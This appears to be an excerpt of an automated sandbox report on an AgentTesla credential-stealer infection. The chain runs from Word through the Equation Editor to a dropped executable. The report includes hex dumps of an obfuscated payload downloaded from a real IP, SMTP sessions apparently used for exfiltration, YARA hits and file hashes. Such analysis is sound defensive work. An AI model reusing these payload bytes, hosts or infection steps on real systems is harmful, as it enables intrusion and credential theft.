                                                                            Jan 27, 2021 19:29:36.354404926 CET10INData Raw: db 01 00 af 21 00 00 08 00 91 00 57 94 01 00 7a 35 01 00 54 2b 00 00 00 00 93 00 3b 93 01 00 3e 4c 01 00 e0 2b 00 00 00 00 93 00 92 93 01 00 8c 34 01 00 30 2c 00 00 08 00 93 00 b4 99 01 00 7d db 01 00 8c 2c 00 00 08 00 93 00 8d 98 01 00 83 db 01
                                                                            Data Ascii: !Wz5T+;>L+40,},,!B5!B5!!64!@z5l->L!'4-}$.
                                                                            Jan 27, 2021 19:29:36.354448080 CET11INData Raw: 82 49 00 ae 61 00 00 06 82 e9 00 d2 64 00 00 0d 82 a9 01 8a 88 00 00 70 34 49 00 db c5 00 00 b4 36 d1 01 62 1b 01 00 14 82 49 00 f5 61 00 00 40 81 61 00 72 1b 01 00 44 37 09 01 cb 9d 00 00 44 37 d9 01 3e 7e 00 00 79 34 d9 01 d5 9d 00 00 44 37 d9
                                                                            Data Ascii: Iadp4I6bIa@arD7D7>~y4D7|64e5k4ey4k4Isd"D7|(D7ISIp44BDLI/64]65I5]6<AA
                                                                            Jan 27, 2021 19:29:36.354485989 CET13INData Raw: 03 0e 5c 00 00 06 83 01 03 e2 59 00 00 06 83 01 03 8a 2a 00 00 06 83 01 03 47 28 00 00 06 83 01 03 34 2a 00 00 06 83 01 03 22 2b 00 00 06 83 01 03 71 5d 00 00 06 83 01 03 28 28 00 00 06 83 01 03 b6 2a 00 00 06 83 01 03 66 2a 00 00 06 83 01 03 53
                                                                            Data Ascii: \Y*G(4*"+q]((*f*S*bE(*o*))**(*1+***((s*{***
                                                                            Jan 27, 2021 19:29:36.354525089 CET14INData Raw: 29 00 00 06 83 01 03 96 29 00 00 06 83 01 03 a6 28 00 00 06 83 01 03 2b 29 00 00 06 83 01 03 45 2a 00 00 06 83 01 03 b4 28 00 00 06 83 01 03 39 29 00 00 06 83 01 03 cf 28 00 00 06 83 01 03 54 29 00 00 06 83 01 03 ea 28 00 00 06 83 01 03 6f 29 00
                                                                            Data Ascii: ))(+)E*(9)(T)(o)))`())t(( ))]**+1>~y49D79I>~I>~1ay4A6I>~
                                                                            Jan 27, 2021 19:29:36.440202951 CET16INData Raw: 00 46 85 e1 03 26 1b 01 00 51 85 e1 03 26 1b 01 00 59 85 e1 03 26 1b 01 00 65 85 e1 03 26 1b 01 00 6e 85 b9 00 05 3a 00 00 75 85 79 04 3e 7e 00 00 79 34 89 04 a0 22 01 00 7c 85 d9 01 3e 7e 00 00 c7 55 c9 02 d2 64 00 00 74 34 c9 01 ac 22 01 00 83
                                                                            Data Ascii: F&Q&Y&e&n:uy>~y4"|>~Udt4"J"Ja>~k4"Ka>~L>~k4wDnm""p4i"16#I#Sl5Y>~y4I#/|


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.2249168193.239.147.10380C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 27, 2021 19:29:37.731040955 CET262OUTGET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1
                                                                            Host: 193.239.147.103
                                                                            Connection: Keep-Alive
                                                                            Jan 27, 2021 19:29:37.780169010 CET263INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 27 Jan 2021 18:29:37 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 912812
                                                                            Last-Modified: Tue, 26 Jan 2021 23:17:49 GMT
                                                                            Connection: keep-alive
                                                                            Vary: Accept-Encoding
                                                                            ETag: "6010a31d-dedac"
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Accept-Ranges: bytes
                                                                            Data Raw: 3c 70 3e 4b 4b 48 59 47 48 6f 6d 6d 48 47 48 65 48 47 48 47 48 47 48 6d 48 47 48 47 48 47 48 77 55 55 48 77 55 55 48 47 48 47 48 6f 72 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 6f 77 72 48 47 48 47 48 47 48 6f 6d 48 65 6f 48 6f 72 42 48 6f 6d 48 47 48 6f 72 47 48 59 48 77 47 55 48 65 65 48 6f 72 6d 48 6f 48 4b 42 48 77 47 55 48 65 65 48 72 6d 48 6f 47 6d 48 6f 47 55 48 6f 6f 55 48 65 77 48 6f 6f 77 48 6f 6f 6d 48 6f 6f 6f 48 6f 47 65 48 6f 6f 6d 48 59 4b 48 6f 47 59 48 65 77 48 59 59 48 59 4b 48 6f 6f 47 48 6f 6f 47 48 6f 6f 6f 48 6f 6f 42 48 65 77 48 59 72 48 6f 47 6f 48 65 77 48 6f 6f 6d 48 6f 6f 4b 48 6f 6f 47 48 65 77 48 6f 47 55 48 6f 6f 47 48 65 77 48 42 72 48 4b 59 48 72 65 48 65 77 48 6f 47 59 48 6f 6f 6f 48 6f 47 47 48 6f 47 6f 48 6d 42 48 6f 65 48 6f 65 48 6f 47 48 65 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 72 47 48 42 59 48 47 48 47 48 4b 42 48 6f 48 65 48 47 48 77 42 48 6f 42 65 48 6f 42 48 59 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 77 77 6d 48 47 48 65 6d 48 47 48 6f 6f 48 6f 48 72 47 48 47 48 47 48 77 55 6d 48 65 48 47 48 47 48 42 48 47 48 47 48 47 48 47 48 47 48 47 48 42 77 48 77 59 48 6d 48 47 48 47 48 65 77 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 65 77 48 47 48 47 48 47 48 77 48 47 48 47 48 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 59 42 48 6d 48 47 48 47 48 77 48 47 48 47 48 47 48 47 48 47 48 47 48 77 48 47 48 59 42 48 6f 65 65 48 47 48 47 48 6f 42 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 77 65 42 48 77 72 48 6d 48 47 48 4b 59 48 47 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 72 72 48 65 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 6d 48 6d 48 47 48 6f 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 65 77 48 47 48 47 48 72 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 72 48 65 77 48 47 48 47 48 4b 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 6d 42 48 6f 6f 42 48 6f 47 6f 48 6f 77 47 48 6f 6f 42 48 47 48 47 48 47 48 42 72 48 77 55 65 48 65 48 47 48 47 48 65 77 48 47 48 47 48 47 48 77 55 6d 48 65 48 47 48 47 48 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 65 77 48 47 48 47 48 59 42 48 6d 42 48 6f 6f 6d 48 6f 6f 55 48 6f 6f 6d 48 59 59 48 47 48 47 48 47 48 72 72 48 65 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 47 48 6d 48 47 48 47 48 47 48 47 48 6d
                                                                            Data Ascii: <p>KKHYGHommHGHeHGHGHGHmHGHGHGHwUUHwUUHGHGHormHGHGHGHGHGHGHGHBmHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHowrHGHGHGHomHeoHorBHomHGHorGHYHwGUHeeHormHoHKBHwGUHeeHrmHoGmHoGUHooUHewHoowHoomHoooHoGeHoomHYKHoGYHewHYYHYKHooGHooGHoooHooBHewHYrHoGoHewHoomHooKHooGHewHoGUHooGHewHBrHKYHreHewHoGYHoooHoGGHoGoHmBHoeHoeHoGHeBHGHGHGHGHGHGHGHrGHBYHGHGHKBHoHeHGHwBHoBeHoBHYBHGHGHGHGHGHGHGHGHwwmHGHemHGHooHoHrGHGHGHwUmHeHGHGHBHGHGHGHGHGHGHBwHwYHmHGHGHewHGHGHGHewHmHGHGHGHGHoBHGHewHGHGHGHwHGHGHmHGHGHGHGHGHGHGHBHGHGHGHGHGHGHGHGHYBHmHGHGHwHGHGHGHGHGHGHwHGHYBHoeeHGHGHoBHGHGHoBHGHGHGHGHoBHGHGHoBHGHGHGHGHGHGHoBHGHGHGHGHGHGHGHGHGHGHGHweBHwrHmHGHKYHGHGHGHGHewHmHGHrrHeHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHBmHmHGHowHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHewHGHGHrHGHGHGHGHGHGHGHGHGHGHGHrHewHGHGHKwHGHGHGHGHGHGHGHGHGHGHGHmBHooBHoGoHowGHooBHGHGHGHBrHwUeHeHGHGHewHGHGHGHwUmHeHGHGHwHGHGHGHGHGHGHGHGHGHGHGHGHGHGHewHGHGHYBHmBHoomHooUHoomHYYHGHGHGHrrHeHGHGHGHewHmHGHGHmHGHGHGHGHm
                                                                            Jan 27, 2021 19:29:37.780224085 CET265INData Raw: 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 6d 48 47 48 47 48 42 6d 48 6d 42 48 6f 6f 6d 48 6f 47 6f 48 6f 47 72 48 6f 6f 6f 48 59 59 48 47 48 47 48 6f 77 48 47 48 47 48 47 48 47 48 42 6d 48 6d 48 47 48 47
                                                                            Data Ascii: HGHGHGHGHGHGHGHGHGHGHGHGHGHBmHGHGHBmHmBHoomHoGoHoGrHoooHYYHGHGHowHGHGHGHGHBmHmHGHGHwHGHGHGHmHmHGHGHGHGHGHGHGHGHGHGHGHGHGHBmHGHGHBBHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHewHwYHmHGHGHGHGHGHKwHGHGHGHwHGHUHGHoUwHoYUHeHGHrmHrYHGHGHeHGHwHGHoomHGHGHBHwoBHo
                                                                            Jan 27, 2021 19:29:37.780278921 CET266INData Raw: 47 48 77 55 6d 48 59 48 6f 48 47 48 6f 42 77 48 65 4b 48 65 77 48 77 48 47 48 47 48 47 48 77 55 6d 48 59 48 77 48 47 48 6f 42 77 48 6d 47 48 59 4b 48 47 48 47 48 6f 47 48 6d 77 48 6f 65 47 48 6f 6f 6d 48 42 59 48 4b 48 47 48 6f 6f 77 48 65 77 48
                                                                            Data Ascii: GHwUmHYHoHGHoBwHeKHewHwHGHGHGHwUmHYHwHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHBYHKHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHrKHKHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHomo
                                                                            Jan 27, 2021 19:29:37.780329943 CET267INData Raw: 48 47 48 47 48 6f 47 48 6d 77 48 6f 65 47 48 6f 6f 6d 48 6f 42 59 48 59 48 47 48 6f 6f 77 48 65 77 48 6f 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 48 47 48 47 48 47 48 77 55 6d 48 59 48 47 48 47 48 6f 42 77 48
                                                                            Data Ascii: HGHGHoGHmwHoeGHoomHoBYHYHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHworHoomHwwKHYHGHoowHewHeHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHeKHewHwHGHGHGHwUmHYHwHGHoBwHmGHYKHGHGHoGHmwHoe
                                                                            Jan 27, 2021 19:29:37.780371904 CET269INData Raw: 48 65 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 48 47 48 47 48 47 48 77 55 6d 48 59 48 47 48 47 48 6f 42 77 48 65 4b 48 65 77 48 6f 48 47 48 47 48 47 48 77 55 6d 48 59 48 6f 48 47 48 6f 42 77 48 65 4b 48 65 77
                                                                            Data Ascii: HeHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHeKHewHwHGHGHGHwUmHYHwHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHwmeHooHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoKmHoomHYHowHGHoowHewHwHGHGHGHomoH
                                                                            Jan 27, 2021 19:29:37.780411959 CET270INData Raw: 48 77 55 6d 48 59 48 6f 48 47 48 6f 42 77 48 6d 47 48 59 4b 48 47 48 47 48 6f 47 48 6d 77 48 77 6f 72 48 6f 6f 6d 48 6f 55 6f 48 6f 65 48 47 48 6f 6f 77 48 65 77 48 65 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47
                                                                            Data Ascii: HwUmHYHoHGHoBwHmGHYKHGHGHoGHmwHworHoomHoUoHoeHGHoowHewHeHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHeKHewHwHGHGHGHwUmHYHwHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHoKKHoeHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGH
                                                                            Jan 27, 2021 19:29:37.780442953 CET272INData Raw: 6d 48 6f 47 55 48 6f 55 48 47 48 6f 6f 77 48 65 77 48 77 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 48 47 48 47 48 47 48 77 55 6d 48 59 48 47 48 47 48 6f 42 77 48 65 4b 48 65 77 48 6f 48 47 48 47 48 47 48 77 55
                                                                            Data Ascii: mHoGUHoUHGHoowHewHwHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHoeYHoUHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoKmHoomHoKeHoUHGHoowHewHwHGHGHGHomoHeHGHGHoHe
                                                                            Jan 27, 2021 19:29:37.780481100 CET273INData Raw: 6f 42 77 48 6d 47 48 59 4b 48 47 48 47 48 6f 47 48 6d 77 48 6f 65 47 48 6f 6f 6d 48 4b 65 48 6f 4b 48 47 48 6f 6f 77 48 65 77 48 6f 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 48 47 48 47 48 47 48 77 55 6d 48 59
                                                                            Data Ascii: oBwHmGHYKHGHGHoGHmwHoeGHoomHKeHoKHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoKmHoomHoweHoKHGHoowHewHwHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHoKUHoKHGHoow
                                                                            Jan 27, 2021 19:29:37.780529022 CET274INData Raw: 48 6f 48 6f 42 48 47 48 47 48 77 48 47 48 77 72 48 47 48 6f 47 42 48 6f 65 6d 48 47 48 6f 4b 48 47 48 47 48 47 48 47 48 77 4b 48 6d 72 48 77 48 47 48 6f 4b 6d 48 47 48 47 48 47 48 6f 48 47 48 47 48 6f 4b 48 47 48 6f 6f 6d 48 6d 65 48 47 48 47 48
                                                                            Data Ascii: HoHoBHGHGHwHGHwrHGHoGBHoemHGHoKHGHGHGHGHwKHmrHwHGHoKmHGHGHGHoHGHGHoKHGHoomHmeHGHGHoowHwUmHomHoHGHoomHBoHGHGHoowHwUmHomHwHGHooUHwGHGHGHoGHwUmHomHeHGHwUmHowHoHGHmGHoHGHGHmeHoooHwwHGHGHoGHwUmHomHmHGHUBHUBHGHGHGHwUmHoeHmHGHmGHweHGHGHoGHwUmHomHUHGH
                                                                            Jan 27, 2021 19:29:37.780571938 CET276INData Raw: 6d 48 55 48 47 48 77 55 6d 48 6f 77 48 55 48 47 48 6d 47 48 77 6d 48 47 48 47 48 6f 47 48 77 55 6d 48 6f 77 48 77 48 47 48 6d 47 48 77 55 48 47 48 47 48 6f 47 48 77 6f 72 48 77 55 6d 48 6f 6d 48 42 48 47 48 77 55 6d 48 6f 77 48 65 48 47 48 77 55
                                                                            Data Ascii: mHUHGHwUmHowHUHGHmGHwmHGHGHoGHwUmHowHwHGHmGHwUHGHGHoGHworHwUmHomHBHGHwUmHowHeHGHwUmHowHBHGHmGHwBHGHGHoGHoooHwKHGHGHoGHerHGHwUmHoeHmHGHmGHwrHGHGHoGHwUmHomHKHGHwUmHowHKHGHUrHoKrHwUUHwUUHwUUHwwoHoKHGHGHGHwUmHoeHmHGHwUmHwwHwHGHGHwKHoooHwYHGHGHoGHG
                                                                            Jan 27, 2021 19:29:37.827893972 CET277INData Raw: 48 47 48 6f 47 48 47 48 77 77 47 48 77 55 6d 48 6f 77 48 65 48 47 48 6f 6f 6f 48 65 47 48 47 48 47 48 6f 47 48 77 55 6d 48 6f 6d 48 47 48 47 48 55 42 48 47 48 47 48 47 48 47 48 77 55 6d 48 6f 77 48 47 48 47 48 6d 77 48 47 48 47 48 6f 48 6f 42 48
                                                                            Data Ascii: HGHoGHGHwwGHwUmHowHeHGHoooHeGHGHGHoGHwUmHomHGHGHUBHGHGHGHGHwUmHowHGHGHmwHGHGHoHoBHGHGHwHGHwrHGHoGBHoemHGHoKHGHGHGHGHwKHmrHwHGHoKmHGHGHGHoHGHGHoKHGHoomHweeHGHGHoowHwUmHomHoHGHoomHKHoHGHoowHwUmHomHwHGHooUHwGHGHGHoGHwUmHomHeHGHwUmHowHoHGHmGHoHGHG


                                                                            SMTP Packets

                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                            Jan 27, 2021 19:30:18.838618040 CET58749169198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:18.839448929 CET49169587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:19.032927036 CET58749169198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:19.033739090 CET49169587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:19.228844881 CET58749169198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:25.400098085 CET58749170198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:25.400990009 CET49170587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:25.594579935 CET58749170198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:25.595061064 CET49170587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:25.788259029 CET58749170198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:33.386825085 CET58749172198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:33.387015104 CET49172587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:33.582669973 CET58749172198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:33.583038092 CET49172587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:33.778525114 CET58749172198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:42.642733097 CET58749173198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:42.643021107 CET49173587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:42.847354889 CET58749173198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:42.847765923 CET49173587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:43.051781893 CET58749173198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:52.774681091 CET58749174198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:52.775216103 CET49174587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:52.979588985 CET58749174198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:52.980285883 CET49174587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:53.184436083 CET58749174198.54.122.60192.168.2.22220 Ready to start TLS
                                                                            Jan 27, 2021 19:30:59.243333101 CET58749175198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                            Jan 27, 2021 19:30:59.243845940 CET49175587192.168.2.22198.54.122.60EHLO 724536
                                                                            Jan 27, 2021 19:30:59.437447071 CET58749175198.54.122.60192.168.2.22250-MTA-09.privateemail.com
                                                                            250-PIPELINING
                                                                            250-SIZE 81788928
                                                                            250-ETRN
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-ENHANCEDSTATUSCODES
                                                                            250-8BITMIME
                                                                            250 STARTTLS
                                                                            Jan 27, 2021 19:30:59.438045025 CET49175587192.168.2.22198.54.122.60STARTTLS
                                                                            Jan 27, 2021 19:30:59.631119013 CET58749175198.54.122.60192.168.2.22220 Ready to start TLS

                                                                            Code Manipulations

                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Start time:19:29:37
                                                                            Start date:27/01/2021
                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                            Imagebase:0x13f540000
                                                                            File size:1424032 bytes
                                                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:19:29:38
                                                                            Start date:27/01/2021
                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                            Imagebase:0x400000
                                                                            File size:543304 bytes
                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:19:29:39
                                                                            Start date:27/01/2021
                                                                            Path:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Imagebase:0x11e0000
                                                                            File size:246784 bytes
                                                                            MD5 hash:D0154FB70ABD786136AE9F68F285541C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            General

                                                                            Start time:19:29:47
                                                                            Start date:27/01/2021
                                                                            Path:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Imagebase:0x11e0000
                                                                            File size:246784 bytes
                                                                            MD5 hash:D0154FB70ABD786136AE9F68F285541C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low

                                                                            General

                                                                            Start time:19:29:47
                                                                            Start date:27/01/2021
                                                                            Path:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Imagebase:0x11e0000
                                                                            File size:246784 bytes
                                                                            MD5 hash:D0154FB70ABD786136AE9F68F285541C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >

                                                                              Executed Functions

                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4796
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: c415cd59c57866e780e9c67ffd870bdf926329f3e41c2525302daf93d7c2602d
                                                                              • Instruction ID: a679e03985f635f5f03025790022005b9391e12c94f90f15173b6b89d5ded367
                                                                              • Opcode Fuzzy Hash: c415cd59c57866e780e9c67ffd870bdf926329f3e41c2525302daf93d7c2602d
                                                                              • Instruction Fuzzy Hash: 5FA14871D002199FDF20CFA4CC81BEEBBB2BF49314F1585AAD849A7284DB749985CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4796
                                                                              Memory Dump Source
